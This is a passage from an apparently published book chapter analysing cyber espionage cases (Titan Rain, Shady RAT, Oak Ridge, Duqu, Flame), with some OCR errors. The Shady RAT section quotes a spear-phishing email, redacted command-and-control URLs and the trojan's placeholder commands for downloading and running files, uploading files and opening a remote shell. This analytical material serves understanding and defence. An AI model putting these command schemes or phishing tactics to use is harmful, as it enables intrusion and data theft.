that no harm was caused. 

These incidents—Maroochy, Springfield, Houston, Carrell—are a far 
cry from “cyber war.” None harmed any human beings, and none had a 
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tangible political goal. Yet they are among the most serious control sys¬ 
tem intrusions on record. But it would be shortsighted to dismiss the 
threat of serious computer attacks: the future of computer sabotage 
seems to be bright and the phenomenon seems to be on the rise. In 
2012, the number of malicious programs that were able to “withdraw 
efficiency” from companies and governments multiplied quickly. 
Stuxnet set a new standard for what is possible. Shodan, the search 
engine, has removed some obscurity by exposing a vast number of Inter¬ 
net-facing control systems, although the details of the various installa¬ 
tions certainly remain obscure, thus limiting what an attacker could 
accomplish, but by no means preventing a successful attack. A physically 
harmful attack on an industrial control system is a highly likely future 
scenario. “Eventually, somebody will get access to a major system and 
people will be hurt,” prOf, the hacker who penetrated the Houston water 
plant, told The Washington Post. “It’s just a matter of time.” But it is 
important to keep these risks in perspective. Almost all acts of compu¬ 
ter-sabotage to date have been non-violent, harming neither machines 
nor human beings (Stuxnet, which harmed an unknown number of 
machines in Iran’s Natanz nuclear enrichment plant, seems to be the 
only known exception). Such non-violent acts of sabotage seem to be on 
the rise—the Saudi Aramco incident discussed in the opening paragraph 
of this chapter is an ideal example, not least because the attack’s ICS 
component failed—and they clearly have the capability to undermine 
the trust and the confidence that consumers and citizens place in com¬ 
panies and governments, and in the products and services that they 
offer. They can also undermine the trust the executives place in their 
organization. Increased digitization and automation offer more and 
more opportunities for attackers to withdraw efficiency without actual 
physical destruction. In that sense sabotage in the age of computer 
attack is becoming less violent, not more violent. 
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The second offensive activity that is neither crime nor war is espionage. 
Cyber espionage is an attempt to penetrate an adversarial computer 
network or system for the purpose of extracting sensitive or protected 
information. Two major distinctions dominate the organization as well 
as the study of intelligence. Intelligence agencies may either restrict 
themselves to collecting and analyzing information, while remaining 
largely passive observers—or spy agencies may also engage in operations, 
almost always covert operations, with the intention of concealing the 
entire operation (clandestine operations) or at least the identity of the 
sponsor. The second distinction concerns the nature of intelligence col¬ 
lection: it can be either social or technical in nature. That division of 
labor is old. In the intelligence community it is reflected in the distinc¬ 
tion between human intelligence, HUMINT, and signals intelligence, 
SIGINT. Sensitive information transmitted by telecommunication is 
often encrypted. Espionage that takes advantage of SIGINT therefore 
requires the use of specialists in decryption and cryptanalysis. The field 
of signals intelligence is wide: it includes intercepting civilian and mili¬ 
tary radio signals, satellite links, telephone traffic, mobile phone conver¬ 
sations, and of course intercepting communication between computers 
through various data protocols, such as email and voice-over-internet- 
protocol. Gaining illicit access into computer networks is therefore only 
one, albeit a fast-growing, part of signals intelligence. Some conceptual 
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clarity can be achieved by applying both distinctions to cyberspace: 
cyber espionage, for the purposes of this study, refers to the clandestine 
collection of intelligence by intercepting communications between com¬ 
puters as well as breaking into somebody else’s computer networks in 
order to exfiltrate data. Cyber sabotage, by contrast, would be the com¬ 
puter attack equivalent of covert operations: infiltrating an adversarial 
computer system with malicious software in order to create a desired 
physical effect or to withdraw efficiency from a process. The level of 
technical sophistication required for cyber espionage may be high, but 
the requirements are less demanding than for complex sabotage opera¬ 
tions. This is because espionage is not directly instrumental: its main 
purpose is not achieving a goal, but to gather the information that may 
be used to design more concrete instruments or policies. The novel chal¬ 
lenge of code-enabled sabotage has been discussed in the previous two 
chapters on cyber weapons and sabotage. This chapter will focus on 
cyber espionage. 

The most widespread use of state-sponsored cyber capabilities is for 
the purposes of espionage. Empirically, the vast majority of all political 
cyber security incidents have been cases of espionage, not sabotage. And 
an ever more digitized environment is vastly increasing the number of 
actors in the espionage business. Professionally and expensively trained 
agents working for governments (or large companies) have new compe¬ 
tition from hackers and private individuals, sometimes acting on their 
own initiative yet providing information for a larger cause. This chapter 
will explore the extent of the problem and the major notable cases where 
details are available in the public domain: what are the most spectacular 
network breaches on record? How significant is the threat of electronic 
espionage? (Or, from an offender’s point of view, how big is the oppor¬ 
tunity for cyber espionage?) And what does this mean for intelligence 
agencies struggling to adapt to a new set of challenges? 

The argument put forward on the following pages holds, in sharp 
contrast to the cyber security debate’s received wisdom, that three para¬ 
doxes are limiting the scope of cyber espionage. The first is the danger 
paradox-, cyber espionage is not an act of war, not a weapon, and not an 
armed attack, yet it is a serious threat to the world’s most advanced 
economies. Experts in the use of code, to a degree, are replacing experts 
in the use of force—computer spying, in short, is entirely non-violent 
yet most dangerous. But there’s a caveat: those who are placing their bets 
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on stripping their adversaries of a competitive advantage should be care¬ 
ful not to overestimate the possibilities of large-scale data exfiltration. 
Cyber espionage’s second characteristic is the significance paradox-. 
although cyber espionage is perhaps the most significant form of cyber 
attack, it may not represent a fundamentally game-changing develop¬ 
ment for intelligence agencies—cyber espionage is a game-changer, but 
not for the best spy agencies. This is explained by the third seeming 
contradiction, which I call the normalization paradox-, an intelligence 
agency taking cyber operations seriously will back these operations up 
with human sources, experienced informers, and expert operatives, thus 
progressively moving what the debate refers to as “cyber espionage” out 
of the realm of “cyber” and back into the realm of the traditional trade- 
craft of intelligence agencies, including E1UMINT and covert opera¬ 
tions. The outcome may be surprising: the better intelligence agencies 
become at “cyber,” the less they are likely to engage in cyber espionage 
narrowly defined. Something comparable applies in the arena of com¬ 
mercial espionage. 

The argument is presented in five steps. Understanding the challenge 
of espionage, especially industrial espionage, requires understanding the 
nature of transferring technical expertise. The chapter therefore opens 
with a short conceptual exploration: at closer view, personalized expert 
knowledge about complex industrial or political processes cannot be 
downloaded as easily as is generally assumed. Secondly, some of the 
major cases of cyber espionage will be explored in detail, including 
Duqu, Flame, and Shady Rat. Thirdly, the growing role of social media 
in the cyber espionage business will be examined briefly. The chapter 
concludes by discussing some of the inherent difficulties associated with 
cyber espionage: distinguishing it from cyber crime, defending against 
it, doing it, and estimating the damage it causes as well as its benefits. 

Some conceptual help is required to understand these limitations. We 
can get this help from Michael Polanyi, a highly influential philosopher 
of science. 1 Polanyi’s work inspired one of the most influential books on 
creativity and innovation ever written, Ikujiro Nonaka’s The Knowledge 
Creating Company , published in 1995. 2 One of Polanyi’s core distinc¬ 
tions concerns that between tacit and explicit knowledge. Tacit knowle¬ 
dge is personal, context-specific, and difficult to formalize and to 
communicate, Nonaka pointed out. It resides in experience, in practical 
insights, in teams, in established routines, in ways of doing things, in 
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social interactions. Such experiences and interactions are hard to express 
in words. Video is a somewhat better format for transmitting such 
knowledge, as anybody who has tried to hone a specific personal skill— 
from kettlebell techniques to cooking a fish pie to building a boat— 
intuitively understands. Explicit knowledge, on the other hand, is 
codified and transmittable in formal, systematic language, for instance 
in an economics textbook or in a military field manual. Explicit know¬ 
ledge, which can be expressed in words and numbers, is only the tip of 
the iceberg. That iceberg consists largely of tacit knowledge. 

A bread-making machine is one of Nonaka’s most instructive 
examples. In the late 1980s, Matsushita Electrical Company, based near 
Osaka and now Panasonic, wanted to develop a top-of-the-line bread¬ 
making machine. The company compared bread and dough prepared by 
a standard machine with that of a master baker. X-raying the dough 
revealed no meaningful differences. Ikuko Tanaka, the head of software 
development, then embedded herself with a well-known chef in Osaka 
International Hotel, famous for its delicious bread. Yet merely observing 
the head baker didn’t teach Tanaka how to make truly excellent bread. 
Only through imitation and practice did she learn how to stretch and 
twist the dough the right way. Even the head baker himself would not 
have been able to write down the “secret” recipe—it was embedded in 
his long-honed routines and practices. Japanese dough and bread¬ 
making holds an important lesson for Western intelligence agencies. 
Tacit knowledge is a major challenge for espionage, especially industrial 
espionage. A Chinese company that is remotely infiltrating an American 
competitor’s network will have difficulty—metaphorically speaking—to 
bake bread to their customers’ delight, let alone manufacture a far more 
complex product like chloride-route processed titanium dioxide, as in 
the case of one of largest China-related conventional corporate espio¬ 
nage cases involving the chemical company Dupont. 3 

No doubt: economic cyber espionage is a major problem. But remo¬ 
tely stealing and then taking advantage of trade secrets by clandestinely 
breaching a competitor’s computer networks is more complicated than 
meets the eye. This becomes evident if one tries to list the most signi¬ 
ficant cases where cyber espionage caused real and quantifiable econo¬ 
mic damage of major proportions—that list is shorter and more 
controversial than the media coverage implies. Among the most high- 
profile cases are three: a remarkable case is a hack that involved the 
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Coca-Cola Corporation. On 15 March 2009, FBI officials quietly 
approached the soft drink company. They revealed that intruders, pos¬ 
sibly the infamous “Comment Group,” had hacked into Coca-Colas 
networks and stole sensitive files about an attempted acquisition of 
China Eluiyuan Juice Group. The deal, valued at $2.4 billion, col¬ 
lapsed three days later. 4 If the acquisition had succeeded, it would have 
been the largest foreign takeover of a Chinese company at the time. A 
second, seemingly similar British case was revealed by MI5’s Jonathan 
Evans in mid-2012, when one UK-listed company allegedly lost a 
£800 million deal as a result of cyber espionage, although the details 
remain unknown. 5 Possibly the most consequential, but also highly 
controversial, example is the demise of Nortel Networks Corp, a once- 
leading telecommunications manufacturer headquartered in Ontario, 
Canada. After the troubled company entered bankruptcy proceedings 
and then liquidation in 2009, Nortel sources claimed that Chinese 
hackers and a nearly decade-long high-level breach had caused, or at 
least contributed to, Nortel’s fall. 6 But again, details about how preci¬ 
sely the loss of data damaged the firm remain mysterious. Other cases 
of real-life costs are discussed later in this book. 

Yet these brief examples already illustrate how difficult it is to analyze 
computer espionage cases and come to general observations. The nature 
of the exfiltrated data is critical: process-related knowledge (think: bread 
making) may reside more in routines and practices, not in reports or on 
hard-drives, and therefore seems to be more difficult to steal and to 
replicate remotely—whereas confidential data about acquisitions and 
business-to-business negotiations may be pilfered from top executives 
and exploited more easily. Only a close empirical analysis can shed light 
on the challenges and limitations of cyber espionage. But too often what 
is known publicly are merely details about the exfiltration method, not 
details about the exfiltrated data and on how it was used or not used. 
The following pages will introduce most major cases of cyber espionage 
and often push the inquiry right to the limit of what is known about 
these cases on the public domain. 

Perhaps the earliest example of cyber espionage is Moonlight Maze, 
which was discussed in chapter one. A more consequential example is 
Titan Rain. Titan Rain is the US government codename for a series of 
attacks on military and governmental computer systems that took place 
in 2003, and which continued persistently for years. Chinese hackers 
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had probably gained access to hundreds of firewalled networks at the 
Pentagon, the State Department, and the Department of Homeland 
Security, as well as defense contractors such as Lockheed Martin. It 
remains unclear if Chinese security agencies were behind the intrusion 
or if an intruder merely wanted to mask his true identity by using com¬ 
puters based in China. Whoever was behind Titan Rain, the numbers 
were eye-popping. In August 2006, during an Air Porce IT conference 
in Montgomery, Alabama, Major General William Lord, then the direc¬ 
tor of information, services and integration in the Air Porce’s Office of 
Warfighting Integration, publicly mentioned the extent of what he 
believed was China’s state-sponsored espionage operation against Ame¬ 
ricas defense establishment. “China has downloaded 10 to 20 terabytes 
of data from the NIPRNET already,” he said, referring to the Pentagon’s 
non-classified but still sensitive IP router network. At the time the cyber 
attackers had not yet breached the Pentagon’s classified networks, the 
so-called SIPRNET, the Secret Internet Protocol Router Network. 7 But 
the unclassified network contains the personal information, including 
the names, of every single person working for the Department of 
Defense. 8 That, Lord assumed, was one of the most valuable things the 
attackers were after. “They’re looking for your identity so they can get 
into the network as you,” Lord said to the airmen and Pentagon 
employees assembled at Maxwell Air Porce Base. 

Twenty terabytes is a lot of information. If the same amount of data 
was printed on paper, physically carrying the stacks of documents would 
require “a line of moving vans stretching from the Pentagon to the 
Chinese freighters docked in Baltimore harbor 50 miles away,” calcula¬ 
ted Joel Brenner, a former senior counsel at the National Security 
Agency. 9 And the Department of Defense was certainly not the only 
target, so there was more than one proverbial line of trucks stretching 
from Washington to Baltimore. In June 2006, for instance, America’s 
Energy Department publicly revealed that the personal information of 
more than 1,500 employees of the National Nuclear Security Adminis¬ 
tration had been stolen. The intrusion into the nuclear security organi¬ 
zation’s network had happened in 2004, but NNSA only discovered the 
breach a year after it had happened. 

In November 2008, the US military witnessed what could be the 
most significant breach of its computers to date. An allegedly Russian 
piece of spyware was inserted into a flash drive on a laptop at a base in 
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the Middle East, “placed there by a foreign intelligence agency,” accor¬ 
ding to the Pentagon’s number two. 10 It then started scanning the Inter¬ 
net for dot-mil domain addresses. In this way the malware gained access 
to the Pentagon’s unclassified network, the NIPRNET. The Defense 
Department’s global secure intranet, the SIPRNET, designed to transmit 
confidential and secret-level information, is protected by an air gap or 
air wall, meaning that the secure network is physically, electrically, and 
electromagnetically separated from insecure networks. So once the piece 
of malware was on a hard drive in the NIPRNET, it began copying itself 
onto removable thumb drives. The hope was that an unknowing user 
would carry it over the air gap into SIPRNET, a problem known as the 
“sneakernet” effect among the Pentagon’s security experts. 11 That indeed 
seems to have happened, and a virtual beachhead was established. But it 
remains unclear if the software was able to extricate information from 
the classified network, let alone what and how much. 

“Shady RAT” is another well-known and well-executed case. It is the 
selection of targets that points to a specific country, but not to a specific 
actor within that country, and in the case of Shady RAT China is the 
suspect. RAT is a common acronym in the computer security industry 
which stands for Remote Access Tool. McAfee, the company that disco¬ 
vered and named the operation, ominously hinted at the enterprising 
and courageous features of the rat in the Chinese horoscope. The attack 
is relatively well documented, so it is instructive to look underneath the 
hood for a moment. 

The attackers operated in a sequence of four steps. First they selected 
specific target organizations according to economic or political criteria. 
The second step was the actual penetration. To penetrate a company’s 
or an organization’s computers, the attackers chose specific individuals 
within those target organizations as entry points. The contact informa¬ 
tion and email addresses for these employees could sometimes be glea¬ 
ned from Linkedln. Based on all available information, the attacker 
then tailored emails to their specific recipients, complete with attach¬ 
ments in commonly used Microsoft Office formats, such as .PPT, . 
DOC, or .XLS, but also PDF files. The files contained an exploit code 
which, when opened, would execute and compromise software running 
on the recipient’s computer. This spear phishing ploy was remarkably 
sophisticated at times. One such email, sent to selected individuals, had 
the subject line “CNA National Security Seminar.” CNA referred to the 
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Alexandria-based Center for Naval Analyses. The email’s body was even 
more specific: 

We are pleased to announce that that Dr. Jeffrey A. Bader will the distin¬ 
guished speaker at the CNA National Security Seminar (NSS) on Tuesday, 

19 July, from 12:00 p.m. to 1:30 p.m. Dr. Bader, who was Special Assis¬ 
tant to the President and Senior Director for East Asian Affairs on the 
National Security Council from January 2009 to April 2011, will discuss 
the Obama Administration and East Asia. 12 

The phishing email’s content was not plucked out of thin air, but 
actually referred to an event that was scheduled at the CNA, and was 
therefore highly credible. The attached file, “Contact List.XLS,” contai¬ 
ned a well-known exploit that was still effective due to Microsoft’s 
less-than-perfect security practices, the so-called Microsoft Excel 
“FEATHEADER” Record Remote Code Execution Vulnerability 
(detected by Bloodhound.Exploit.306). 13 If the recipient’s computer had 
not installed Microsoft’s latest security updates, a clean copy of the Excel 
file would open as intended by the user, in order to avoid suspicion. But 
by clicking the file the user also opened a Trojan. One possible tell-tale 
sign of this particular exploit, Symantec reported, was that the MS Excel 
application would appear unresponsive for a few seconds and then 
resume operating normally, or it might crash and restart. 

Shady RAT’s third step followed suit. As soon as the Trojan had ins¬ 
talled itself on the targeted machine, it attempted to contact a com- 
mand-and-control site through the target computer’s Internet 
connection. The web addresses of these control sites were programmed 
into the malware. Examples were: 

http://www.swimjredacted] .net/images/sleepyboo.jpg 
http://www.comto [redacted]. com/Tech/Lesson 15.htm 
http://www.comto [redacted]. com/wak/ mansherO. gif 

Curiously, the addresses pointed to ordinarily used image files or 
HTML files, among the web’s most common file formats. This tactic, 
Symantec explained, was designed to bypass firewalls. Most protective 
firewalls are configured so that .JPG, .HTM, or .GIF files can pass wit¬ 
hout problem, without arousing the program’s suspicion. The Trojan’s 
image and text files looked entirely legitimate, even if superficially ins¬ 
pected by a human operator. One file, for instance, was headed “C# 
Tutorial, Lesson 15: Drawing with Pen and Brush,” pretending to be a 
manual for a specific piece of software. The text went on: 
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In this lesson I would like to introduce the Pen and the Brush objects. 

These objects are members of GDI+ library. GDI+ or GDI NET is a 

graphics library ... 

And so on. Yet, at closer examination, command-and-control code 
could be found behind the files’ fagade. The .E1TM file, for instance, 
contained hidden HTML comments. Programmers and website desi¬ 
gners can use HTML comments to make notes within HTML files. 
These notes will be ignored by the browser when turning the file into a 
visually displayed website, but are visible to anybody reading the entire 
HTML file, be it a human or an artificial agent. The beginning of such 
comments is marked with, “<!—” and their end with “—>”. Shady RAT 
hid the coveted commands in these HTML comments. An example: 

<!—{685DEC108DA731F1}—> 

<!—{685DEC108DA73CF1}—> 

<!—{eqNBb-0u07WM}—> 

<!—{ujQ-iY,UnQ[!,hboZWg}—> 

Even if a zealous administrator opened an .HTM file in a simple text 
editor, which is normally used to write or modify legitimate code, these 
comments would be unsuspicious and harmless. Many programs that 
are used to design websites leave such unintelligible comments behind. 
But the Shady RAT Trojan would be able to decipher the cryptic com¬ 
ments by “parsing” them, as computer scientists say. Once parsed, the 
actual commands appear: 

run: {URL/FILENAME} 
sleep: {20160} 

{IP ADDRESS}:{PORT NUMBER} 

The first command, for instance, would result in an executable file 
being downloaded into a temporary folder on the target computers hard 
drive and then executed, much like clandestinely installing a malicious 
app from an illegitimate app store. What the app would be able to do is 
not specified by the Trojan. The second command, “sleep,” would tell 
the Trojan to lay dormant for two weeks—counted in minutes—and 
then awake to take some form of action. The third command is perhaps 
the most useful for the designers of the Shady RAT attack. It takes the 
attack to the next level. It does so by telling the compromised machine 
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to open a remote connection to another computer, identified by the IP 
address, at a specific port. 

That final step of the Shady RAT attack enables the attackers to 
control the target computer directly. The Trojan establishes what is cal¬ 
led a “remote shell” with the machine that holds the desired informa¬ 
tion. A hidden remote shell is a bit like plugging in a distant screen with 
a separate keyboard, clandestinely, all hidden from the user who in the 
meantime may be working on a document in Microsoft Word or writing 
an email in Outlook. To install the attacker’s hidden screen and key¬ 
board, the Trojan waits for a handshake from its controller through the 
freshly established port connection. To identify themselves, the attackers 
would whisper a password to the hidden Trojan. The string characters 
looked somewhat like the following seemingly random characters: 

Once the Trojan received the password it sprang into action by 
copying a specific file, cmd.exe, into a folder reserved by the Microsoft 
operating system. The espionage software then used the newly copied 
file to open a remote shell, that is, the remote screen and keyboard, 
giving the attackers significant control over the files on the compromised 
machine. Below is a list of commands that the attacker may use to get 
to work: 

gfijFILENAME} retrieves a file from the remote server. 

http:{URL}.exe retrieves a file from a remote URL, beginning with http 

and ending in .exe. The remote file is downloaded and executed. 

pf:{FILENAME} uploads a file to the remote server. 

taxi:Air Material Command sends a command from the remote server. 

sip:{RESULT} sends the results of the command executed above to the 

remote server to report the status. 14 

These commands are quite comprehensive. The gf command, for 
instance, allows the attacker to infiltrate additional packets of malware, 
say to do a specific job that the Trojan is not equipped for in the first 
place. The most coveted command may be pf, which was used to exfil¬ 
trate specific files from a targeted organization to a hidden attacker, of 
course clandestinely. 

McAfee was the first to make the attack public in a report in early 
August 2011. 15 The report was led by Dmitri Alperovitch, McAfee’s vice 
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president for threat research. Alperovitch’s team was able to identify 
seventy-one organizations from the log files of one command-and- 
control server. Among the targets were thirteen defense contractors, six 
agencies that belonged to the US Federal Government, five national and 
international Olympic Committees, three companies in the electronics 
industry, three companies in the energy sector, and two think tanks, as 
well as the Canadian and Indian governments and the United Nations. 16 
Forty-nine targets were in the United States, and the rest were in Wes¬ 
tern Europe and leading Asian countries, including Japan, South Korea, 
Taiwan, and India. That the Olympic Committees as well as the World 
Anti-Doping Agency were targeted was especially curious. Beijing 
hosted the Games in 2008, just when the attacks seemed to peak. Alpe- 
rovitch concluded that this fact “potentially pointed a finger at a state 
actor behind the intrusions,” especially because the Olympia-related 
intrusions were unlikely to result in any immediate economic benefit. 
Some attacks also continued for an extended period of time. McAfee 
reported that one major American news organization headquartered in 
New York City was compromised for more than twenty-one months. 

McAfee called the attacks “unprecedented.” Alex Gostev, chief secu¬ 
rity expert at Kaspersky Lab, one of McAfee’s competitors, disputed this 
finding. “Until the information in the McAfee report is backed up by 
evidence, to talk about the biggest cyberattack in history is premature,” 
he told Computerworld shortly after the attack became public. 17 Others 
agreed. “Is the attack described in Operation Shady RAT a truly 
advanced persistent threat?” asked Symantec researcher Lion Lau in a 
blog post. “I would contend that it isn’t.” 18 Whatever the operation’s 
best description—details about the volume and the nature of the exfil- 
trated data remain largely unknown. It is also unclear if and how the 
attackers were able to take advantage of the stolen information. Unfor¬ 
tunately this lack of knowledge is the rule rather than the exception. 

Oak Ridge National Laboratory in Tennessee is the largest research 
institution focusing on energy-related science and technology under the 
umbrella of the Department of Energy. The lab, with a workforce of 
more than 4,200 and approximately 3,000 guest researchers a year, is 
one of America’s leading neutron science and nuclear energy research 
institutions. It houses some of the world’s most powerful computers. On 
7 April 2011, unknown attackers set their sights on the lab. The attack 
was shrewd. A spoofed email purportedly from the lab’s human resource 
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office contained a zero-day exploit, a previously unknown vulnerability, 
possibly in Microsoft Internet Explorer or Adobe Flash Player. The fake 
email was sent to 573 employees, informing them about benefit-related 
alterations by inviting them to follow a link for more detailed informa¬ 
tion. This trick succeeded. Department of Energy officials specified that 
the attacker had managed to steal approximately 1 gigabyte of data, the 
equivalent of a few thousand photos, or 1/64 the memory size of a 
standard smart phone. “When I think about how many pictures my 
daughter has on her iPhone, it’s really not a significant amount of data,” 
said Barbara Penland, the deputy director of communications for the 
Oak Ridge National Lab. 19 Thom Mason, Oak Ridge’s director, suspec¬ 
ted the attackers were after scientific data. Yet they seem to have failed 
to penetrate the lab’s classified network. In the aftermath of the attack, 
Oak Ridge lab turned off Internet access, including emails, to cut off 
possibly ongoing exfiltrations as well as follow-on attacks. 

The attack was not the lab’s first. On 29 October 2007, Oak Ridge 
had already suffered a serious attack, along with other federal labs, inclu¬ 
ding Los Alamos National Laboratory in New Mexico and California’s 
Lawrence Livermore National Laboratory. An unknown group of hac¬ 
kers had sent email messages with compromised attachments to a large 
number of employees, with some staff members receiving seven phishing 
emails designed to appear legitimate. One email mentioned a scientific 
conference and another phishing email contained information about a 
Federal Trade Commission complaint. In total, the attack included 
1,100 attempts to penetrate the lab. In Oak Ridge, eleven employees 
opened a dodgy attachment, which allowed the attackers to exfiltrate 
data. The data were most likely stolen from a database that contained 
personal information about the lab’s external visitors, going back to 
1990. Although the information contained sensitive personal details, 
such as Social Security numbers, it was probably the coveted research 
results or designs that the attackers were after. In Los Alamos, one of 
only two sites in the United States specializing in top-secret nuclear 
weapons research, hackers also successfully infiltrated the unclassified 
network and stole “a significant amount of data,” a spokesman admit¬ 
ted. 20 DHS officials were later able to link that attack to China. The US 
Cyber Emergency Response Team, US-CERT, backed up that claim 
with a list of IP addresses registered in China that were used in the 
attack. Yet the details were not granular enough to link the attack to any 
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particular agency or company. Ultimately the US was unable to attri¬ 
bute a wave of sophisticated attacks against some of the country’s most 
sensitive research installations. 

A comparable case was “Duqu.” In early October 2011, the Labora¬ 
tory of Cryptography and System Security, geekily abbreviated as 
CrySyS Lab, at the Budapest University of Technology and Economics 
discovered a new and exceptionally sophisticated malware threat which 
created files with the prefix “-DQ,” and so the Elungarian engineers 
analyzing it called it Duqu. 21 The threat was identified as a remote access 
tool, or RAT. Duqu’s mission was to gather intelligence from control 
systems manufacturers, probably to enable a future cyber attack against 
a third party using the control systems of interest. “The attackers,” 
Symantec speculated, “are looking for information such as design docu¬ 
ments that could help them mount a future attack on an industrial 
control facility.” 22 Duqu was found in a number of unnamed companies 
in at least eight countries, predominantly in Europe. 23 The breaches 
seem to have been launched by targeted emails, “spear phishing” in 
security jargon, rather than by mass spam. In one of the first attacks, a 
“Mr. B. Jason” sent two emails with an attached MS Word document to 
the targeted company, the name of which was specifically mentioned in 
the subject line as well as in the email’s text. The first email, sent on 17 
April 2011 from a probably hijacked proxy in Seoul, Korea, was inter¬ 
cepted by the company’s spam filter. But the second email, sent on 21 
April with the same credentials, went through and the recipient opened 
the attachment. Duqu had a keylogger, was able to take screenshots, 
exfiltrate data, and exploit a Windows kernel vulnerability, a highly 
valuable exploit. The threat did not self-replicate, and although it was 
advanced it did not have the capability to act autonomously. Instead, it 
had to be instructed by a command-and-control server. In one case, 
Duqu downloaded an infostealer that was able to record keystrokes and 
collect system data. These data were encrypted and sent back to the 
command-and-control server in the form of .jpg images so as not to 
arouse the suspicion of network administrators. The command-and- 
control server could also instruct Duqu to spread locally via internal 
network resources. 

All these attacks seemed to follow the same pattern. Duqu’s authors 
created a separate set of attack files for every single victim, including the 
compromised .doc file; they used a unique control server in each case; 
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and the exploit was embedded in a fake font called “Dexter Regular,” 
including a prank copyright reference to “Showtime Inc,” the company 
that produces the popular Dexter sitcom about a crime scene investiga¬ 
tor who is also a part-time serial killer. 24 Symantec and CrySyS Lab 
pointed out that there were “striking similarities” between Stuxnet and 
Duqu and surmised that the two were written by the same authors: both 
were modular, used a similar injection mechanism, exploited a Windows 
kernel vulnerability, had a digitally signed driver, were connected to the 
Taiwanese hardware company JMicron, shared a similar design philoso¬ 
phy, and used highly target-specific intelligence. 25 One component of 
Duqu was also nearly identical to Stuxnet. 26 But in one crucial way the 
two threats were very different: Duqu, unlike Stuxnet, was not code that 
had been weaponized. It was neither intended, designed, nor used to 
harm anything, only to gather information, albeit in a sophisticated way. 

One of the most sophisticated cyber espionage operations to date 
became public in late April 2012 when Iran’s oil ministry reported an 
attack that was initially known as Wiper. Details at the time were scarce, 
and the story subsided. Then, a month later, a Hungarian research group 
published a report on the attack that quickly led to it acquiring the 
nickname flame. Competing names in the initial frenzy were “Llamer” 
and “Skywiper.” Several parties announcing their finds on the same day 
created this confusion. On 28 May 2012, CrySyS Lab published a detai¬ 
led 63-page report on the malware. Simultaneously, Kaspersky Lab in 
Russia announced news of the malware. The Iranian national CERT, the 
Maher Centre, had contacted well-known anti-virus vendors to alert 
them to the threat, dubbed by Hungarian experts to be “the most 
sophisticated” and “the most complex malware ever found.” 27 Other 
experts agreed. “Overall, we can say flame is one of the most complex 
threats ever discovered,” Kaspersky Lab wrote. 28 The Washington Post also 
acknowledged the threat: “The virus is among the most sophisticated 
and subversive pieces of malware to be exposed to date.” 29 

The new catch was indeed remarkable, flame was a highly complex 
listening device, a bug on steroids: the worm was able to highjack a 
computer’s microphone in order to record audio clandestinely; secretly 
shoot pictures with a computer’s built-in camera; take screenshots of 
specific applications; log keyboard activity; capture network traffic; 
record Skype calls; extract geolocation from images; send and receive 
commands and data through Bluetooth; and of course exfiltrate locally 
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stored documents to a network of command-and-control servers. 
Meanwhile the worm was dressed up as a legitimate Microsoft update. 
The 20mb-heavy file was approximately twenty times larger than 
Stuxnet, which made it nearly impossible to spread itself by email, for 
instance. Yet its handlers kept Flame on a short leash. The spying tool 
was highly targeted. Kaspersky Lab pointed out that it was a backdoor, 
a Trojan, and the malware had “worm-like features,” which allowed the 
software’s remote human handlers to give commands to replicate inside 
a local network and through removable drives. Kaspersky also estimated 
the number of infected machines to be rather small, around 1,000. 
Once it arrived on a targeted machine, the spying software went to work 
by launching an entire set of operations, including sniffing the network 
traffic, taking screenshots of selected “interesting” applications, such as 
browsers, email clients, and instant messaging services. Flame was also 
able to record audio conversations through a computer’s built-in micro¬ 
phone, if there was one, and of exfiltrating the audio-files in compressed 
form. It could also intercept keystrokes and pull off other eavesdropping 
activities. Large amounts of data were then sent back, on a regular sche¬ 
dule, to Flame’s masters through a covert and encrypted SSL channel via 
predefined command-and-control servers. One of Flame’s most notable 
features was its modularity. Its handlers could install additional functio¬ 
nality into their spying vehicle, much like apps on an iPhone. Kaspersky 
Lab estimated that about twenty additional modules had been deve¬ 
loped. Flame also contained a “suicide” functionality. 30 The lab confir¬ 
med that Stuxnet and Flame shared some design features. 31 

Flame’s most impressive feature is not its multi-purpose design, but 
its success. The quality and the volume of intelligence that the espionage 
tool dispatched to its masters remain unknown, and that is highly unli¬ 
kely to change. The development and possibly the deployment of Flame 
started as early as December 2006, logs from the command-and-control 
code show. The online sleuths, in other words, may have operated in the 
dark for as long as five years. A great deal of camouflage was necessary 
to accomplish this. The code also indicates that at least four program¬ 
mers developed the code, and that team of four authors devised clever 
methods to disguise their operation. One is the control panel design. 
The site with the control interface looked like the early alpha version of 
a command-and-control panel for botnets, with vintage blue links, 
purple when clicked, raw table frames, no graphics, no animations. But 
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the attackers, it seems, deliberately chose a simple-looking and unpre¬ 
tentious interface. They also used unsuspicious words like “data, upload, 
download, client, news, blog, ads, backup,” not botnet, infection, or 
attack. “We believe this was deliberately done to deceive hosting com¬ 
pany sys-admins who might run unexpected checks,” Kaspersky Lab 
wrote. 32 The attackers worked hard to make their effort appear as if it 
was a legal content management system. Another attempt to camouflage 
Plame was the unusually strong encryption of the stolen data itself. 

On 1 June 2012 The New York Times broke the news that the US 
government developed Stuxnet, the world’s most sophisticated publicly 
known cyber attack to date. The US government still did not officially 
admit its authorship, but an FBI investigation into the leaks that led the 
Times to the story can be seen as a tacit statement of fact. Thereafter 
officials would occasionally comment on various aspects of government- 
sponsored computer attacks. Once anti-virus companies like Symantec 
and Kaspersky Lab discovered malware, government-made or not, 
patches and anti-virus measures were made available relatively quickly in 
order to counter the threat to their customers. Anti-virus companies, in 
short, could directly counter a US government-sponsored espionage 
program or even a covert operation. In the case of Flame, one anony¬ 
mous US government official felt the need to reassure The Washington 
Post’s readership that Americas cyber attack was not neutralized by coun¬ 
termeasures against Stuxnet and Flame, “It doesn’t mean that other tools 
aren’t in play or performing effectively,” one former high-ranking Ame¬ 
rican intelligence official told The Washington Post. “This is about prepa¬ 
ring the battlefield for another type of covert action,” he said. Stuxnet 
and Flame, the official added, were elements of a broader and ongoing 
campaign, codenamed Olympic Games, which had yet to be uncovered. 
“Cyber collection against the Iranian program is way further down the 
road than this,” as The Washington Post quoted its anonymous source. 33 
Allegedly, the joint operation involved the National Security Agency, the 
CIA, and most probably IDF Unit 8200. Meanwhile Iran admitted that 
Flame posed a new problem but did not offer many details. “The virus 
penetrated some fields—one of them was the oil sector,” Gholam Reza 
Jalali, an Iranian military official in charge of cyber security, was quoted 
on Iranian state radio in May. “Fortunately, we detected and controlled 
this single incident.” 34 It did not remain a single incident. 

For hunters of government-sponsored espionage software, 2012 was 
shaping up to be the busiest year on record. The summer that year was 
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exceptionally hot, especially in Washington, DC. On 9 August it was 
again Kaspersky Lab who found the newest cyber espionage platform: 
Gauss. The malware’s capabilities were notable. Gauss was a complex 
cyber espionage toolkit, a veritable virtual Swiss army knife. Like Flame, 
